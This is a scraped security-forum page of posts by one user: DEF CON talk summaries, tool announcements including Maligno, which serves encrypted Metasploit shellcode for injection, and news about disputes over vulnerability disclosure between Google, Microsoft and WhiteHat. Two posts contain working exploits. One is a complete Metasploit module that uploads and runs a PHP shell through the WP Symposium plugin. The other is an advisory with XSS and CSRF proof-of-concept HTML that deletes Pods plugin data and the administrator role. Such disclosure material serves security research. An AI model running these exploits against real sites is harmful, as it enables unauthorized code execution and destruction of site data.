Open Crypto Audit Project – PDF Practical Aerial Hacking & Surveillance – PDF White Paper From root to SPECIAL: Pwning IBM Mainframes – PDF PoS Attacking the Traveling Salesman – PDF Don’t Fuck It Up! – PDF Source
      • 1
      • Thanks
  14. Aerosol
    It Went Downhill From There ? Been under-employed for over a year ? When I get bored, bad things happen ? I still fly to a lot of speaking gigs ? Started thinking about airplane tracking ? This is why I should always be employed Read more: http://korben.info/wp-content/uploads/defcon/SpeakerPresentations/Renderman/DEFCON-20-RenderMan-Hackers-plus-Airplanes.pdf
  15. Aerosol
    Defcamp 21 ? Hacker camp on WA coast ? Project: Run a GSM network. ? My task: Procure SIM Cards ? “Subscriber Identity Module” ? Contains an identity (IMSI) and symmetric key (Ki). ? “Secure” (key can’t be extracted; can’t be cloned) ? Used by GSM carriers and now LTE (Verizon) ? Can also run apps?! Read more: https://www.defcon.org/images/defcon-21/dc-21-presentations/Koscher-Butler/DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
  16. Aerosol
    Cross Site Request Forgery ? No trust relationship between browser and router ? Can’t forge Basic Authentication credentials ? Anti-CSRF ? Limited by the same origin policy ? DNS Rebinding ? Rebinding prevention by OpenDNS / NoScript / DNSWall ? Most rebinding attacks no longer work ? Most… Read More: https://www.defcon.org/images/defcon-18/dc-18-presentations/Heffner/DEFCON-18-Heffner-Routers.pdf
  17. Aerosol
    Defcon Killing the Rootkit! And how to find everything running on your system!!! • Rootkit/APT technique for hiding processes – Unlink kernel structures “DKOM” • New 64bit detection technique ! DC22 exclusive - – System/Platform independent technique – Linux/BSD/Windows/ARM64/ADM64 • Works by analyzing physical memory & properties of MMU Virtual Memory system Read More: https://www.defcon.org/images/defcon-22/dc-22-presentations/Macaulay/DEFCON-22-Shane-Macaulay-Weird-Machine-Motivated-Practical-Page-Table-Shellcode-UPDATED.pdf ( nu l-am mai vazut pe forum, daca am gresit categoria rog un moderator sa il mute... Articol de nota 10
  18. Aerosol
    A simple script to search on Shodan with the following options: Simple tool to search in Shodan [+] Search Results for IP [+] Search Results for quantity [+] Normal Search [+] List the saved query [+] Search the saved query that were already searched [+] Add popular tags [+] List all services shodan located [+] DNS Lookup [+] Reverse DNS Lookup [+] Return your IP [+] It gives you information about your API They must have an API Key yours to use API Shodan. Download GitHub
  19. Aerosol
    Persongen is a tool that generates Norwegian Social Security Numbers (SSNs). It implements Wikipedia's algorithm for calculating SSNs. SSNs are generated based on a given date of birth, gender, and SSN type. As you may guess, Persongen can be useful for testing applications which handle Norwegian SSNs. Changelog: Output coloring, update detection routine and other minor improvements. sha-256sum: 024803d511f5eacb51f8eb11825e35a7303420eb4368d7f31853a800a904ef7c Download
  20. Aerosol
    Am observat ca este postata o varianta mai veche pe forum asa ca m-am gandit sa postez si aceasta versiune. ==================================================================== Maligno is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded prior to transmission. Maligno also comes with a client tool, which supports HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine. The client-server communications can be configured in a way that allows you to simulate specific C&C communications or targeted attacks. In other words, the tool can be used as part of adversary replication engagements. Changelog: Adjustments to server and client HTTP request headers for improved adversary replication, invocation of socks4a auxiliary module migrated from msfcli to msfconsole, other minor fixes. sha-256sum: 43f36f577dec1520eff727da3da49af10f27705a92d3ecf435b6d6c1ff4a669a Download Changes: Adjustments to server and client HTTP request headers for improved adversary replication, invocation of socks4a auxiliary module migrated from msfcli to msfconsole, other minor fixes.
  21. Aerosol
    Numai bine in ceea ce vei face dar nu inteleg un lucru cum adica ca simplu utilizator( ai avut vre-un grad? ) o.O in fine, cat despre partea cu "forumul e urmarit" daca esti "curat" si nu faci prostii nu ai de ce sa te temi.
  22. Aerosol
    Microsoft has criticised Google for its public disclosure of a Windows flaw, claiming the company's actions were irresponsible and benefited hackers. Google disclosed a Windows 8.1 bug publicly last week having privately reported the vulnerability to Microsoft in September as a part of its ongoing Project Zero security initiative. Project Zero is a security initiative launched by Google in July 2014 that initially discloses flaws in private to the firms concerned and gives them a 90-day deadline to release a fix before making the research public. Microsoft Trustworthy Computing senior director Chris Betz criticised Google's January disclosure, claiming the firm had responded to Google's disclosure and was developing a fix in a blog post. "[Google] has released information about a vulnerability in a Microsoft product, two days before our planned fix on our well-known and coordinated Patch Tuesday cadence, despite our request that they avoid doing so," he said. "Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix." He added that Google's actions would undoubtedly benefit hackers more than end users. "Although following through keeps to Google's announced timeline for disclosure, the decision feels less like principles and more like a ‘gotcha', with customers the ones who may suffer as a result," he said. "What's right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal. "Even for those able to take preparatory steps, risk is significantly increased by publicly announcing information that a cyber criminal could use to orchestrate an attack and assumes those that would take action are made aware of the issue." Betz said the disclosure is part of a wider issue with operations like Project Zero, arguing companies should instead follow a Coordinated Vulnerability Disclosure (CVD) policy. "Releasing information absent context or a stated path to further protections, unduly pressures an already complicated technical environment," he said. "It is necessary to fully assess the potential vulnerability, design and evaluate against the broader threat landscape, and issue a ‘fix' before it is disclosed to the public, including those who would use the vulnerability to orchestrate an attack." Google had not responded to a request for comment from V3 when contacted. Experts within the security community have been divided over the merits of public versus private disclosure policies for many years. F-Secure security adviser Sean Sullivan told V3, while he is sympathetic to Microsoft's point, the firm should have made its argument earlier. "Microsoft should have complained about Google's policy months ago if it has a problem with it. Google Online Security has recommended 60 days in some cases since at least May 2013," he said. "On the other hand, just because Google discovered this vulnerability on September 30, 2014 doesn't mean it should disclosure exactly 90 days later - that's just evil. "There's no reason Google's official formula can't be 90 days plus or minus some X number of days for the nearest scheduled monthly update." Microsoft has been criticised for its slow response to privately disclosed flaws in the past. The firm failed to patch a critical vulnerability in Internet Explorer 8 leaving users open to attack more than 180 days after researchers privately disclosed the bug in May 2014. Source
  23. Aerosol
    A spat between Google and Whitehat Security has erupted after engineers at the search giant revealed dangerous vulnerabilities found in the latter's anti-Google privacy-centric Chrome spin-off browser. The holes in the Aviator browser reported by Google security bods Justin Schuh and Tavis Ormandy described include a remote code execution bug revealed before White Hat was told of the problem. "You probably shouldn't be using the WhiteHat Aviator browser if you’re concerned about security and privacy," Schuh said in a blog, later labelling the project of low quality and White Hat's response "the kind of thing just gives open source a bad name". His blog was, he said, an attempt to outline by way of example the difficulties in securing web browsers, stating that Google employs a 30-strong Chrome security team, another dozen Googlers and "none of us are ever short on work." "Superficial branding" work meant Aviator was two releases behind Chrome, other bugs demonstrated what Schuh said an indication the added code did not "seem to have been written with a sufficient understanding of how Chrome works, or with adequate regard for security". "Take this case where explicit debug breaks are disabled for seemingly no reason at all," he wrote. "In Chrome that call is expected to safely terminate sandboxed processes in a whole slew of situations where the process cannot safely recover, but in Aviator all of those cases have now been turned into potentially exploitable vulnerabilities." WhiteHat labs vice president Robert Hansen responded, rejecting Schuh's claim that the added privacy in Aviator could be made in Chrome using the Disconnect extension and some tweaks on the grounds that the average user did not know how to do this. "Let me make it clear, we never claimed to be as fast as Google at releasing updates," Hansen said. "Google gets the benefit of making in excess of $50 billion-a-year from ads by marketing it's users to advertisers. Therefore, Google has a lot of vested interest in keeping the browser up to par and capable of delivering more ads to those users. To say we are outmatched is an understatement." He said Aviator had added features such as the ability to stop referring URLs being sent cross domain and having private mode activated by default which were not options available in Chrome. Schuh issued an update hitting back that the small company still did not explain why it added branding at the expense of staying up to date with Chromium releases and firing a salvo in dubbing Aviator code "simply of extremely low quality and littered with fairly trivial security vulnerabilities". "So, even if they fixed all the vulnerabilities they added, I don't see how they could ever keep this up to date against disclosed vulnerabilities already fixed in the stable version of Chrome," he said. "Overall though, I'm just increasingly disappointed that the response continues abdicating responsibility for such sweeping and inaccurate claims (e.g. 'the web's most secure and private browser'), or that making the source public somehow absolves them of that responsibility." ® Bootnote Users concerned enough with privacy would probably be motivated to learn how to activate functions such as Disconnect and various other security tweaks, and would know that when something is free, they are the product. And researchers who find vulnerabilities in code should make some efforts to privately-disclose the bugs, notably if their own company wishes others to do so for its products. Source
  24. Aerosol
    ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress WP Symposium 14.11 Shell Upload', 'Description' => %q{WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /wp-symposium/server/file_upload_form.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server.}, 'License' => MSF_LICENSE, 'Author' => [ 'Claudio Viviani', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['OSVDB', '116046'], ['WPVDB', '7716'] ], 'DisclosureDate' => 'Dec 11 2014', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wp-symposium < 14.12', {}]], 'DefaultTarget' => 0 )) end def check check_plugin_version_from_readme('wp-symposium', '14.12') end def generate_mime_message(payload, payload_name, directory_name, symposium_url) data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="uploader_uid"') data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"') data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') payload_url = normalize_uri(symposium_url, unique_name, payload_name) data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') print_status("#{peer} - Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' print_good("#{peer} - Uploaded the payload") register_files_for_cleanup(payload_name) print_status("#{peer} - Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) print_good("#{peer} - Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else vprint_error("#{peer} - HTTP Status: #{res.code}") vprint_error("#{peer} - Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end end end Source
  25. Aerosol
    Vulnerability title: Wordpress plugin Pods <= 2.4.3 XSS and CSRF vulnerabilities vulnerabilities Author: Pietro Oliva CVE: CVE-2014-7956, CVE-2014-7957 Product: pods Affected version: pods <= 2.4.3 Vulnerabilities fixed in version: 2.5 XSS vulnerability (CVE-2014-7956, authentication is needed): http://localhost/wp-admin/admin.php?page=pods&action=edit&id=4"></a><script>alert('xss')</script><!-- Multiple CSRF (CVE-2014-7957,authentication needed): CSRF 1 (bruteforce pods IDs and delete them): <html> <body> <script> target="http://localhost"; for (i=0; i<50;i++) document.write('<img style="display:none" src="'+target+'/wp-admin/admin.php?page=pods&action=delete&id='+i+'">'); </script> </body> </html> CSRF 2 (delete pods plugin data): <html> <body onload="document.forms[0].submit();"> <form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset"> <input type="hidden" name="pods_reset" value="Reset Pods settings and data "> </form> </html> CSRF 3 (deactivate pods and delete data): <html> <body onload="document.forms[0].submit();"> <form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&tab=reset&pods_reset_deactivate= Deactivate and Delete Pods data "> <input type="hidden" name="pods_reset_deactivate" value=" Deactivate and Delete Pods data "> </form> </html> CSRF 4 (enable "roles and capabilities" component and delete admin role): <html> <script> function continueExecution(){ document.write('<link rel="stylesheet" href="http://localhost/wordpress/wp-admin/admin.php?page=pods-component-roles-and-capabilities&action=delete&id=administrator">'); } document.write('<link rel="stylesheet" href="http://localhost/wordpress/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=1">'); setTimeout(continueExecution, 10000); </script> </html> CSRF 4 XSS impact: http://localhost/wp-admin/admin.php?page=pods-components&action=toggle&id=roles-and-capabilities&toggle=1&toggled=111111111" onmouseenter="alert('xss')" style="width:3000px;height:1000px;left:0px;top:0px;position:absolute;opacity:0;"></a><!-- Source
×
×
  • Create New...